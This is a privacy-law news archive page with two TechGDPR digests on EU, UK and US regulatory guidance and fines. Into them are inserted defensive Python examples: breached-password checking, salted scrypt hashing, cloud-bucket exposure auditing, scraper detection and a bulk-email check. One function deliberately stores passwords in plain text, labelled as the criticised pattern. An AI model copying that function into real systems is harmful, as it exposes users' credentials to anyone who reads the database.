Digital Services Act Archives - TechGDPR
https://techgdpr.com/blog/tag/digital-services-act/

Data protection digest 3 – 17 Jan 2024: digital services transparency and risk assessment in the focus of regulators
https://techgdpr.com/blog/data-protection-digest-18012024-digital-services-transparency-and-risk-assessment-in-the-focus-of-regulators/
Published Thu, 18 Jan 2024 on TechGDPR.
Our latest data protection bulletin focuses on digital services transparency and safety, from decentralised clinical trials and health apps to electronic payments and audience measurement. Data transfer impact assessments and the performance of DPOs also feature in this issue.

Sign up to receive our fortnightly digest via email.

Legal processes

Digital Services Act: Online services will have new obligations when the EU’s Digital Services Act becomes fully applicable on 17 February. The regulation aims to reduce illegal content, increase the transparency of advertising and recommender systems, and improve the protection of minors. The largest platforms have already been supervised directly by the European Commission since mid-2023; from mid-February, Member States are responsible for supervising the smaller platforms.

EU adequacy decisions list: The European Commission concluded its review of 11 existing adequacy decisions. Andorra, Argentina, Canada, the Faroe Islands, Guernsey, the Isle of Man, Israel, Jersey, New Zealand, Switzerland and Uruguay therefore continue to be recognised as providing adequate data protection. The Commission also monitors the more recent arrangements in place with the UK, the US, Japan and South Korea.

Regulatory updates

Decentralised clinical trials: To support sponsors in designing decentralised clinical research projects, the French data protection regulator CNIL and its state partners are setting up a pilot phase from January to June 2024, in which 20 selected projects will receive targeted support. (The European Commission published its recommendations on decentralised clinical trials in 2022, in the wake of the COVID-19 pandemic.) Each application to the pilot must include:

  • a specific question mentioning the decentralised component and summarizing the problem encountered;
  • a proposal for a complete scenario for the implementation of the decentralised element of the research project, a summary of the protocol and the information notice for future participants.

DPO evaluation: The EDPB identified areas for improvement to promote the role and recognition of data protection officers. In 2023, thousands of organisations and DPOs across the EEA were contacted, covering a wide range of sectors, and more than 17,000 replies were received and analysed. The majority of the DPOs surveyed state that they have the necessary skills and knowledge for their work and receive regular training; they have clearly defined tasks in line with the GDPR and do not receive instructions on how to exercise their duties. They generally have sufficient resources to carry out their tasks and are, in most cases, involved in decisions relating to personal data.

However, the answers highlight a significant disparity in resources between DPOs in large companies and those in small public bodies: the public-sector DPO often carries out the role alone, while the private-sector DPO generally has a team.

Transfer Impact Assessment

A Transfer Impact Assessment must be carried out by controllers or processors acting as data exporters, with the assistance of the importer, before transferring data from a European Economic Area country to a third country where the transfer relies on one of the Art. 46 GDPR transfer tools (such as standard contractual clauses). Because the importer holds much of the information needed for this assessment, its cooperation is essential. The French data protection authority has therefore published a draft guide (in English) on how to carry out the analysis by following the steps set out in the EDPB’s recommendations. The consultation on the draft is open until 12 February.

(If the country of destination is covered by an adequacy decision of the European Commission, the exporter is not subject to this obligation. The same applies if the transfer relies on one of the derogations listed in Art. 49 of the GDPR.)

Cookies and audience measurement

The Spanish data protection authority published a guide on the use of cookies for audience measurement, (in Spanish). The management of a website, or mobile application, by a publisher generally requires the use of traffic or performance statistics. The information processed through the use of cookies for this purpose can be managed directly by the publisher or by a provider who can provide a comparative audience measurement service. In that case, the provider would act as a data processor for one or more publishers. 

Cookies used to obtain traffic or performance statistics may be exempt from consent under certain conditions, strictly limited to what is necessary to provide the service. In particular, to remain exempt, these cookies or similar technologies must not result in the data being combined with other processing operations or transmitted to third parties. Nor may they allow a person’s browsing to be tracked across different applications or browsers, as many of the audience measurement offers available on the market do.

Similarly, the Austrian data protection authority published a FAQ on cookies and data protection (in German). In particular, it explains what “technically necessary” cookies are, how to use industry standards or “cookie consent tools”, and how to identify the GDPR roles and responsibilities (controller or processor) when cookies are set for your digital services.

More official guidance

Fitness trackers: Such apps and devices are usually connected to the Internet and to other apps and devices of various kinds. This multiplies the sensitive data processed and shared, and with it the IT security risks. According to the Italian data protection agency, it is therefore always advisable to take some basic precautions when using these tools:

  • always read the information notice carefully (who will process your data, and how);
  • minimise data collection (disable features that are not essential, use a pseudonym, delete data);
  • if access to other devices or data is not essential for the device or app to function, do not grant the permission (for example, address book contacts, photos, calendar or microphone);
  • security first (strong authentication, downloads only from official app stores, periodic updates);
  • if you don’t use it, turn it off or uninstall it from your device; and
  • do not let minors use these devices and apps unless supervised by an adult.

Generative AI: Meanwhile the UK Information Commissioner’s Office, (ICO), has launched a consultation series on generative Artificial Intelligence. Generative AI models are being used across the economy to create new content, from music to computer code. The first consultation examines when it is lawful to train generative AI models on personal data scraped from the web. The ICO is seeking views from a range of stakeholders, including developers and users of generative AI, legal advisors and consultants working in this area, civil society groups and other public bodies with an interest in generative AI. The first consultation is open until 1 March.


CJEU ruling

Controller’s (non) strict liability: In a recent judgment the CJEU held that a controller can be fined for an infringement, including one committed by a processor acting on its behalf, only where the controller acted intentionally or negligently; there is no strict liability. Processing carried out by the processor is attributed to the controller unless the processor processed the data:

  • for its own purposes;
  • outside the framework of, or the arrangements for, the processing as determined by the controller; or
  • in a manner that the controller cannot reasonably be considered to have consented to.

The case concerned the development of a COVID-19 mobile application and raised questions of joint controllership between the IT service provider and the Lithuanian Public Health Centre, which had commissioned the app but never signed a contract for it to be published. The app was nonetheless made available on Google Play, and its privacy policy named both the public centre and the service provider as controllers.

Unsolicited marketing

Food delivery spam: The UK Information Commissioner fined food delivery company HelloFresh 140,000 pounds for 79 million spam emails and 1 million spam texts over seven months. The marketing messages were sent based on an opt-in statement which did not make any reference to the sending of marketing via text. Whilst there was a reference to marketing via email, this was included in an age confirmation statement which was likely to unfairly incentivise customers to agree. Customers were also not given sufficient information that their data would continue to be used for marketing purposes for up to 24 months after cancelling their subscriptions.

“Do not call” register: The UK Commissioner also fined Poxell Ltd 150,000 pounds for making over 2.6 million unlawful marketing calls between March and July 2022. The company made dozens of calls to individuals with dementia and other serious illnesses, offering home improvement products. Its aggressive sales callers failed to identify themselves, withheld the number they were calling from, and did not provide a contact address or freephone number when asked. After receiving the initial investigation letter, the company continued to make unsolicited direct marketing calls until its account was terminated by its communications service provider.

Customer data deletion: The Danish data protection regulator imposed a fine of approx. 33,000 euros against the Royal Theater for not having laid down rules for deleting customer information for marketing use. The theatre stored information on approx. 520,000 customers and newsletter recipients for marketing purposes, without having set deletion deadlines or established fixed procedures or guidelines for deleting the information. The information was only deleted in cases where individual customers specifically requested deletion or revoked their consent to receive direct marketing. 

Data breaches

Inappropriate coding: The Danish data protection regulator also recommended a record fine of approx. 2 million euros against Netcompany. As a data controller it had not implemented appropriate security measures in the development of mit.dk, a system that lets users read and respond to digital correspondence from the authorities, access their medical records and pay bills. Netcompany had used inappropriate coding in the component that authenticated mit.dk users, so when mit.dk went into operation in March 2022 a fault appeared almost immediately: several users who logged on were shown other users’ sensitive information.

Password recycling: Finally, DNA-testing company 23andMe is blaming its users for its data breach, Messenger.com reports. The October breach exposed data on about 6.9 million users. Customers received a letter from the company stating that 23andMe was not responsible for the incident: attackers had logged into roughly 14,000 accounts using passwords those customers had recycled from earlier breaches of other websites (credential stuffing), and then used the DNA Relatives matching feature of those accounts to collect data on the millions of other users linked to them. The company has since been sued many times, with every claim citing inadequately secured customer information.
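The defence against this kind of credential stuffing is to reject recycled passwords at registration and password change. The following is an added example, not code from 23andMe or TechGDPR, of the k-anonymity range-query pattern popularised by Have I Been Pwned’s Pwned Passwords service: the client hashes the candidate password with SHA-1, sends only the first five hex characters, receives every matching suffix with its count, and compares locally, so the full hash never leaves the client. The breach corpus and the `fetch_range` stand-in are constructed so the example runs offline, and the 12-character minimum is an assumed policy.

```python
import hashlib

# Constructed stand-in for a breach corpus: plaintext -> number of times seen.
# A real corpus holds only SHA-1 hashes; the plaintexts are here solely so the
# example can build range lines offline. SHA-1 is used because that is the
# corpus's matching key, not as a way to store passwords (see the next item).
_SAMPLE_CORPUS = {
    "password": 9_000_000,
    "Summer2023!": 1200,
    "letmein": 350_000,
    "P@ssw0rd1234567": 4100,
}


def sha1_prefix_suffix(password: str) -> tuple[str, str]:
    """Split the uppercase SHA-1 hex digest into the 5-char prefix that is
    sent and the 35-char suffix that stays on the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix: str) -> list[str]:
    """Stand-in for the network call: every corpus line whose hash starts
    with `prefix`, in the "SUFFIX:COUNT" line format the real service uses."""
    lines = []
    for plaintext, count in _SAMPLE_CORPUS.items():
        p, s = sha1_prefix_suffix(plaintext)
        if p == prefix:
            lines.append(f"{s}:{count}")
    return lines


def breach_count(password: str) -> int:
    """How many times the password appears in the corpus (0 if never).
    Only the prefix is disclosed; the suffix match happens on the client."""
    prefix, suffix = sha1_prefix_suffix(password)
    for line in fetch_range(prefix):
        seen_suffix, _, count = line.partition(":")
        if seen_suffix == suffix:
            return int(count)
    return 0


def password_acceptable(password: str, min_length: int = 12) -> tuple[bool, str]:
    """Policy check at registration or password change (min_length assumed)."""
    if len(password) < min_length:
        return False, f"must be at least {min_length} characters"
    hits = breach_count(password)
    if hits:
        return False, f"seen {hits} times in known breaches; choose another"
    return True, "ok"
```

In production `fetch_range` would issue the HTTPS request for the prefix; everything else stays the same, and because the server only ever sees five hex characters it cannot tell which of the hundreds of hashes in that range the user typed.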

More enforcement decisions

Electronic payments: The French data protection regulator imposed a fine of 105,000 euros on NS CARDS France, which publishes the neosurf.com website and the “Neosurf” mobile app for making online payments after registering. The company had set a ten-year retention period, at the end of which user accounts were deactivated but not deleted, so account data was in practice kept indefinitely. The ten-year period was also applied to all user accounts indiscriminately, without distinguishing the data that must be kept (for example, under consumer rights legislation) from the rest. In addition, the password complexity rules for user accounts were insufficiently robust, and passwords were stored in plain text in the database alongside the users’ email address and ID.
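Storing a password next to the email address and ID, as described above, means a single database read hands an attacker a working credential for every other site where the user reused it. The added example below, not NS CARDS France’s code, shows the weak pattern beside the corrected one: a per-user random salt, the memory-hard scrypt KDF from Python’s standard library, a self-describing record that carries its own cost parameters so they can be raised later without a forced reset, and a constant-time comparison on verification. The record format and the cost parameters are assumptions.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# --- Weak pattern criticised in the decision: the password stored as typed ---

def store_plaintext(users: dict, user_id: int, email: str, password: str) -> None:
    """Anyone who can read the table can log in as every user."""
    users[email] = {"id": user_id, "password": password}


# --- Hardened pattern: salted, memory-hard hash in a self-describing record ---

# Assumed cost parameters: scrypt needs about 128 * N * R bytes per hash,
# 16 MiB here; raise N as hardware allows.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return "scrypt$N$R$P$salt$key". `salt` is a parameter only so that
    tests can be deterministic; callers should let it default to 16 random bytes."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(key).decode("ascii")])


def verify_password(record: str, password: str) -> bool:
    """Recompute with the parameters stored in the record and compare in
    constant time, so a wrong guess takes as long as a near miss."""
    try:
        scheme, n, r, p, salt_b64, key_b64 = record.split("$")
    except ValueError:
        return False  # malformed or legacy record
    if scheme != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(key_b64)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(key, expected)


def needs_rehash(record: str) -> bool:
    """True if the record does not use the current scheme and parameters;
    call after a successful login and re-store with hash_password()."""
    parts = record.split("$")
    if parts[0] != "scrypt" or len(parts) != 6:
        return True
    return (int(parts[1]), int(parts[2]), int(parts[3])) != (SCRYPT_N, SCRYPT_R, SCRYPT_P)


def store_hashed(users: dict, user_id: int, email: str, password: str) -> None:
    """What the users table should hold instead: only the derived record."""
    users[email] = {"id": user_id, "password_hash": hash_password(password)}
```

The same shape works with Argon2id if a third-party library is acceptable; the point is the record format, the per-user salt and the constant-time check, none of which depend on the KDF chosen.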

The regulator also noted the deposit of Google Analytics cookies on the user’s terminal without their consent. NS CARDS France also used a reCAPTCHA mechanism, provided by Google, when creating the account and logging in to the website and mobile application. The collected data was transmitted to Google for analysis but the company did not provide any information to the user and did not obtain their prior consent.

Risk assessment failed: Meanwhile, the Dutch data protection authority imposed a fine of 150,000 euros on International Card Services (ICS). ICS failed to carry out a DPIA before the company started digitally identifying customers in the Netherlands in 2019. Furthermore, the personal information used for identification was sensitive. In addition to customers’ names, addresses, telephone numbers and e-mails, this included a photo that customers had to take of themselves and send via a mobile phone or webcam. ICS then used these photos to compare them with copies of customers’ IDs. 

Data security

Data breach types: The Danish data protection authority focuses on 10 typical breaches of personal data security and comes up with concrete proposals on how they can be avoided, (in Danish). This includes things like auto-complete which causes e-mails to be sent to the wrong recipients, broad access to data on network drives, unauthorised access to data due to poor design, coding errors and insufficient testing, failure to delete data using digital tools, loss/theft of portable devices with unencrypted data, disclosure of data stored in template and form solutions, and more.

My Health My Data: Washington State published a FAQ on the My Health My Data Act, the first privacy-focused law in the United States to protect consumer health data that falls outside the scope of federal health privacy regulation (HIPAA). It covers information that can identify a consumer’s past, present or future physical or mental health status. For example, a record of buying toilet paper or deodorant is not consumer health data, whereas data from an app that tracks someone’s digestion or perspiration is. Regulated entities and small businesses must:

  • publish a separate and distinct link to their consumer health data privacy policy on their homepage;
  • secure valid authorisation from a customer to sell their data. 

Consumers have a right to withdraw consent and a right to have their data deleted. The act takes effect on 31 March for regulated entities. Small businesses have until the end of June to comply with new rules.

Big Data

Meta’s “Pay or okay” consent model: Privacy-advocacy group NOYB stated that Meta unlawfully ignores the users’ right to easily withdraw consent. The group has filed a new complaint with the Austrian data protection authority. According to Meta, the Facebook and Instagram service tries to abide by EU regulations requiring users to have the option of whether or not their data may be gathered and used for targeted advertising. Users who agree to be monitored receive a free service funded by advertising income. However, while one click is enough to consent to be tracked, users can only withdraw their consent by switching to a paid subscription, NOYB concludes.

Data protection digest 15 – 31 August 2023: financial data processing, misconducted learning platforms, and algorithmic disgorgement
https://techgdpr.com/blog/data-protection-digest-01092023-financial-data-misconducted-learning-platforms-and-algorithmic-disgorgement/
Published Fri, 01 Sep 2023 on TechGDPR.
This issue highlights details on financial data processing, the EU Digital Services Act took effect for large online operators, and the US FTC successfully launched “algorithmic disgorgement” via its enforcement.

Legal processes

Financial data: The EDPS discussed recommendations to encourage data sharing to extend the range of available financial services and products, while also giving people or organisations control over the processing of their financial data. Individuals and organisations, according to the proposals, would govern access to their financial data using dashboards offered by financial institutions. Individuals would be able to monitor, limit, or authorize access to their information. Users should be supplied with comprehensive, accurate, and unambiguous information about the financial service provider asking for access to their data. It should also disclose the type of product, payment, or service for which an individual’s data will be utilized, as well as the categories of data required.

Digital Services Act: The Digital Services Act took effect for large online operators serving the EU on 25 August. The 19 designated platforms and search engines with at least 45 million EU users must comply with stricter rules on data collection, privacy, disinformation, dark patterns, online hate speech and more. This includes a ban on targeted advertising to minors based on profiling, and a ban on targeted advertising that uses special categories of personal data such as sexual orientation or religion. These platforms must redesign their systems and prove to the European Commission that they have done so, including by publishing their risk assessments. Additionally, vetted researchers can access the services’ data to analyse systemic risks in the EU. Smaller platforms become subject to the same regulation from 17 February 2024, supervised by national authorities rather than Brussels.

Cybersecurity and risk assessment in California: The California Privacy Protection Agency (CPPA) has published draft Cybersecurity Audit and Risk Assessment Regulations. According to the CPPA, the formal rulemaking process for cybersecurity audits, data protection risk assessments and automated decision-making technologies has yet to begin; these drafts are intended to inform Board deliberations and public participation. They set standards for service providers and contractors, helping organisations meet audit requirements. The draft regulations state that every business whose processing of personal information presents a significant risk to consumers’ security must conduct an audit annually, and they describe the components to be evaluated and the measures to be taken, as summarised by digitalpolicyalert.org.

EU-US Data Privacy Framework: Almost all transfers of personal data to US-based companies are covered by the EU-US Data Privacy Framework, provided the recipient has self-certified under the mechanism, explains the Bavarian state data protection commissioner. However, for transfers of personal data collected in the context of an employment relationship (“HR data”), the US business must explicitly state this in its certification. Particular attention must also be paid to onward transfers, for example where a US processor working for the EU data exporter passes the personal data to a sub-processor in another third country: the US adequacy decision cannot cover that onward transfer.

Official guidance

‘Freedom of Information’ and data protection: Guernsey’s data protection commissioner discusses Freedom of Information requests that have recently caused some extraordinary data breaches (for example, details of thousands of police and civilian personnel employed by the Police Service of Northern Ireland were released in error in response to one). Freedom of Information refers to the right of citizens to access information held by public authorities. In reality, that information will often include personal data about individuals, whether staff, citizens or others the public authority deals with, and the rights of all of them must be considered before any disclosure. If you are a data controller, you must understand your legal obligations concerning data subjects’ rights and have appropriate policies and procedures to ensure requests are handled properly.

Biometric data: Meanwhile the UK Commissioner’s Office is currently consulting on draft guidance on biometric data. This guidance explains how data protection law applies to organisations that use or are considering using biometric recognition systems or vendors of these systems. At a glance:

  • You must take a data protection by design approach when using biometric data.
  • You should do a data protection impact assessment before you use a biometric recognition system. This is because using special category biometric data is likely to result in a high risk.
  • Explicit consent is likely to be the only valid condition for processing available to you to process special category biometric data.
  • If you can’t identify a valid condition, you must not use special category biometric data.

Employees’ digital monitoring rules: Digital work tools can record large amounts of data about employees, and monitoring of that data is therefore heavily restricted, states the Norwegian privacy regulator. In most cases, the employer has no right to monitor an employee’s use of work tools, including Internet use, unless the purpose is to administer the company’s computer network or to uncover or investigate security breaches. Even then, introducing such measures can be difficult in practice, as many rules govern different aspects of the working environment, including trade union approval, transparency obligations, data protection implications and information security.

Privacy by default: This means that products and services are designed to ensure that a person’s privacy is protected from the outset and that they do not need to take any additional steps to protect their data, explains the Latvian data protection regulator. This approach is designed to minimise possible violations in the process of data acquisition and usage, and unauthorized access and risks that could arise if personal data comes into the possession of a third party. This may include minimal necessary data collection, default settings of the user account, (in “private mode”), limited data retention, (followed by automatic anonymisation or deletion of user data if the account is inactive for a certain period), user control tools, (whether to allow the user profile to be found in search engines, etc), clear information notices, (including all third parties with whom the data may be shared), and security measures, (encryption, regular security audits).

Enforcement decisions

UiPath data leak: The Romanian data protection authority has fined UiPath SRL approx. 70,000 euros for a large-scale data leak from its Academy learning platform. The company had not implemented adequate technical and organisational measures to ensure that, by default, personal data could not be accessed without human intervention, including the ability to ensure the ongoing confidentiality and resilience of processing systems and services, and a process for regularly testing, assessing and evaluating the effectiveness of the measures implemented. As a result, the personal data of about 600,000 users of the Academy platform (name and surname, unique identifier, e-mail address, employer, country and details of the level of knowledge attained in the courses) was exposed to unauthorised disclosure and access for about 10 days. This violation is likely to cause physical, material or moral harm to the data subjects, such as loss of control over their data or loss of confidentiality.

Misconfigured cloud storage: The UK Information Commissioner issued a reprimand to a recruitment company that had misconfigured a storage container holding 12,000 records relating to 3,000 workers so that it was publicly accessible without any authentication. The personal data included names, addresses, dates of birth, passports, ID documents and national insurance numbers. The company has since committed to audit the configuration of its cloud services periodically as part of a wider security assessment covering access rights, appropriate identity and access controls, event logging and security monitoring.
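The commitment to audit cloud configuration periodically is the right one, and it is easy to automate. The page does not name the provider, so the added example below, which is not the recruitment company’s or the ICO’s code, assumes S3-style bucket policies, ACLs and public-access-block settings and runs over a constructed inventory, flagging any bucket an anonymous caller could read and saying why.

```python
# Audit an inventory of storage buckets for anonymous access. The inventory
# shape (name, policy, acl, public_access_block) is an assumption modelled on
# what an S3 API export looks like; the buckets themselves are constructed.

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
BLOCK_KEYS = ("BlockPublicAcls", "IgnorePublicAcls",
              "BlockPublicPolicy", "RestrictPublicBuckets")


def _principal_is_anyone(principal) -> bool:
    """Principal "*" or {"AWS": "*"} means every caller, signed or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def policy_findings(policy: dict) -> list[str]:
    """Allow statements open to everyone; a Condition may or may not
    narrow them (aws:SecureTransport does not), so those are flagged for review."""
    out = []
    for i, st in enumerate(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _principal_is_anyone(st.get("Principal")):
            continue
        sid = st.get("Sid", f"Statement[{i}]")
        if st.get("Condition"):
            out.append(f"policy {sid} allows Principal * under a Condition (review it)")
        else:
            out.append(f"policy {sid} allows Principal * with no Condition")
    return out


def acl_findings(acl: dict) -> list[str]:
    """Legacy ACL grants to the AllUsers / AuthenticatedUsers groups."""
    return [f"ACL grants {g['Permission']} to {g['Grantee']['URI'].rsplit('/', 1)[-1]}"
            for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("URI") in PUBLIC_GROUPS]


def audit(inventory: list[dict]) -> dict[str, list[str]]:
    """Map bucket name -> reasons it is reachable without authentication."""
    findings = {}
    for bucket in inventory:
        pab = bucket.get("public_access_block", {})
        if all(pab.get(k) for k in BLOCK_KEYS):
            continue  # all four block settings neutralise public policy and ACLs
        reasons = policy_findings(bucket.get("policy", {})) + acl_findings(bucket.get("acl", {}))
        if reasons:
            findings[bucket["name"]] = reasons
    return findings


PUBLIC_READ = lambda name: {"Statement": [{
    "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
    "Action": "s3:GetObject", "Resource": f"arn:aws:s3:::{name}/*"}]}

# Constructed inventory: one bucket open via policy, one with the same policy
# neutralised by the block, one open via a legacy ACL, one internal only.
SAMPLE_INVENTORY = [
    {"name": "hr-records", "policy": PUBLIC_READ("hr-records"),
     "acl": {"Grants": []}, "public_access_block": {}},
    {"name": "payroll-archive", "policy": PUBLIC_READ("payroll-archive"),
     "acl": {"Grants": []}, "public_access_block": {k: True for k in BLOCK_KEYS}},
    {"name": "candidate-cvs", "policy": {},
     "acl": {"Grants": [{"Grantee": {"Type": "Group",
                                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                         "Permission": "READ"}]},
     "public_access_block": {"BlockPublicPolicy": True}},
    {"name": "build-cache",
     "policy": {"Statement": [{"Effect": "Allow",
                               "Principal": {"AWS": "arn:aws:iam::123456789012:role/ci"},
                               "Action": "s3:*", "Resource": "*"}]},
     "acl": {"Grants": []}, "public_access_block": {}},
]
```

Run `audit(SAMPLE_INVENTORY)` to get the two exposed buckets with their reasons; in a real estate the inventory would come from the provider’s API and the job would run on a schedule, with any non-empty result paged to the owning team.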

Vklass data leak: The Swedish privacy regulator has reprimanded the learning platform Vklass for being unable to detect abnormal user behaviour in the platform or to trace what happened in the system. Multiple complainants reported that an unauthorised person had obtained personal data about teachers and students from the platform; the reports came from municipal committees and private businesses that run schools and educational activities. The incident most likely occurred because a student wrote a script that automatically harvested information from the learning platform into a database, and the information was then published openly on a website, which has since been closed.
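The regulator’s two findings, no detection of abnormal use and no ability to reconstruct events, are both answered by access logs that record who read which record, plus a simple baseline over them. The added example below, not Vklass’s code, scans constructed access-log lines and flags any account whose count of distinct records read within one hour is far above the population median, which is the signature a harvesting script leaves behind. The log format, the window and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import statistics


def build_sample_log() -> str:
    """Constructed log (ISO timestamp, user id, method, path): a few ordinary
    users, plus one account that walks student records 1..300 a second apart."""
    normal = [
        "2023-05-02T08:00:01 u1001 GET /api/students/5001",
        "2023-05-02T08:00:15 u1001 GET /api/students/5002",
        "2023-05-02T08:05:00 u1001 GET /api/students/5003",
        "2023-05-02T08:01:00 u2002 GET /api/students/5001",
        "2023-05-02T08:02:00 u3003 GET /api/teachers/77",
        "2023-05-02T08:02:30 u3003 GET /api/teachers/77",
    ]
    t0 = datetime(2023, 5, 2, 9, 0, 0)
    scraper = [f"{(t0 + timedelta(seconds=i)).isoformat()} u9999 GET /api/students/{i}"
               for i in range(1, 301)]
    return "\n".join(normal + scraper)


def parse(log: str) -> list[tuple[datetime, str, str]]:
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, user, _method, path = line.split()
        events.append((datetime.fromisoformat(ts), user, path))
    return events


def peak_distinct_records(events, window: timedelta) -> dict[str, int]:
    """For each user, the largest number of distinct paths read within any
    span of length `window` (sliding window over that user's sorted events)."""
    by_user = defaultdict(list)
    for ts, user, path in events:
        by_user[user].append((ts, path))
    peaks = {}
    for user, evs in by_user.items():
        evs.sort()
        counts = defaultdict(int)
        start = best = 0
        for ts, path in evs:
            counts[path] += 1
            while ts - evs[start][0] > window:      # drop events that fell out of the window
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            best = max(best, len(counts))
        peaks[user] = best
    return peaks


def find_scrapers(log: str, window: timedelta = timedelta(hours=1),
                  min_records: int = 50, ratio: float = 10.0) -> dict[str, int]:
    """Users whose peak exceeds both an absolute floor and `ratio` times the
    median peak across all users. The floor stops a small population from
    being flagged merely for sitting above a median of one or two."""
    peaks = peak_distinct_records(parse(log), window)
    if not peaks:
        return {}
    threshold = max(min_records, ratio * statistics.median(peaks.values()))
    return {user: n for user, n in peaks.items() if n > threshold}
```

Because the log keeps the user and the path of every read, the same data that raises the alert also answers the second question the regulator asked, which records were taken and when.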

Edmodo and minors’ consent: Meanwhile in the US, the Federal Trade Commission obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parent’s consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule, (COPPA), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. Among many orders, the provider is obliged to identify the account in question and delete or destroy certain data, (from students under 13 years of age), periodically provide compliance reports to the Commission, permanently refrain from collecting more personal information than reasonably necessary for the child to participate in any activity offered on the online platform, etc.

Data security

High-risk systems: For some so-called “critical” IT processing, a data breach would create particularly high risks for people, so such systems require a correspondingly high level of security. To support the professionals concerned, the French regulator CNIL has submitted a recommendation for public consultation (in French). It targets “critical” processing, defined by two cumulative criteria: a) the processing is large-scale within the meaning of the GDPR, and b) a personal data breach could have very significant consequences for the data subjects, for state security or for society as a whole.

This includes customer databases and other processing that bring together a large part of the population, such as in the energy, transport, banking or large-scale dematerialised public services, health treatments, etc. Risk scenarios may include attacks by organised criminal organisations or “supply chain attacks”, likely to take place over a long period; the compromise of third-party service providers responsible for IT development, maintenance or support operations; the exploitation of unknown vulnerabilities of software or hardware components, the compromise of persons authorised to access the processing. 

Email security guidance: Guidance by the UK Information Commissioner explains what organisations should, and could do to comply with email security, including several case studies and a checklist. Even if email content doesn’t have anything sensitive in it, showing which people receive an email could disclose sensitive or confidential information about them. In brief: 

  • You must assess what technical and organisational security measures are appropriate to protect personal information when sending bulk emails.
  • You should train staff about security measures when sending bulk communications.
  • You should include in your assessment consideration of whether using secure methods, such as bulk email services or mail merge services, is more appropriate, rather than just relying on a process that uses Blind Carbon Copy.
  • If you are only sending an email to a small number of recipients, you could consider sending each one separately, rather than one bulk email. 
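One way to turn the last two points into a control rather than a reminder, as an added example that is not the ICO’s code (the organisation’s domain and the recipient list are assumptions): a pre-send check that refuses any message exposing more than one external address in To or Cc, and a helper that builds one message per recipient, the mail-merge shape the guidance prefers over a single bulk message.

```python
from email.message import EmailMessage
from email.utils import getaddresses

OWN_DOMAIN = "example.org"  # assumed organisation domain


def visible_recipients(msg: EmailMessage) -> list[str]:
    """Addresses every recipient will see: To and Cc (Bcc is stripped in transit,
    which is exactly why a To/Cc slip discloses the whole list)."""
    pairs = []
    for header in ("To", "Cc"):
        pairs.extend(getaddresses([str(v) for v in msg.get_all(header, [])]))
    return [addr for _name, addr in pairs]


def is_external(addr: str) -> bool:
    return not addr.lower().endswith("@" + OWN_DOMAIN)


def check_before_send(msg: EmailMessage, max_visible_external: int = 1):
    """Return (ok, exposed): `exposed` lists the external addresses the message
    would disclose to every other recipient; ok is False when there are too many."""
    exposed = [a for a in visible_recipients(msg) if is_external(a)]
    return len(exposed) <= max_visible_external, exposed


def one_message_per_recipient(sender: str, subject: str, body: str,
                              recipients: list[str]) -> list[EmailMessage]:
    """Build a separate message for each recipient, each passing the check."""
    messages = []
    for rcpt in recipients:
        m = EmailMessage()
        m["From"] = sender
        m["To"] = rcpt
        m["Subject"] = subject
        m.set_content(body)
        ok, exposed = check_before_send(m)
        if not ok:
            raise ValueError(f"message to {rcpt} would expose {exposed}")
        messages.append(m)
    return messages


# Constructed recipient list for a notice whose audience is itself sensitive.
RECIPIENTS = ["ann@mail.example", "bo@mail.example", "cy@mail.example"]


def accidental_bulk(sender: str = "clinic@example.org") -> EmailMessage:
    """The mistake the guidance warns about: everyone in To."""
    m = EmailMessage()
    m["From"] = sender
    m["To"] = ", ".join(RECIPIENTS)
    m["Subject"] = "Your appointment"
    m.set_content("Please confirm your appointment.")
    return m
```

The check is cheap enough to sit in whatever sends the mail (a helpdesk integration, a script, a mail gateway), and it fails before anything leaves the organisation rather than after.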

Big Tech

OpenAI for organisations: OpenAI is offering its most powerful version of ChatGPT to enterprises, with longer context windows for processing longer inputs, advanced data analysis capabilities, customisation options and more. According to the company, 80 per cent of Fortune 500 companies (the largest US corporations) have registered ChatGPT accounts, as determined by accounts associated with corporate email domains. Businesses have raised privacy and security concerns, fearing that their data may be used to train ChatGPT and that staff could inadvertently expose sensitive customer information to the model. According to OpenAI, ChatGPT Enterprise customers retain full rights and ownership over their data, which will not be used for training.

‘Algorithmic disgorgement’: At the same time, the US Federal Trade Commission reminds companies of certain obligations when using Generative AI. When offering a generative AI product, companies need to inform customers whether and the extent to which AI training data includes copyrighted or otherwise protected material. Companies should not try to “fool people” into thinking that AI-generated works were created by humans. Companies must ensure that customers understand the material terms and conditions associated with digital products. The regulator also noted that unilaterally changing terms or undermining reasonable ownership expectations can be problematic, etc. Finally, in its enforcement of data protection regulations, the Commission has lately begun to compel “algorithmic disgorgement” – the destruction of not just the illegally obtained data itself, but also artificial intelligence models and algorithms constructed using such data.

Data protection & privacy digest 19 Jan – 3 Feb 2023: threshold for cookies, spy pixels, consent evidence, data storage and deletion
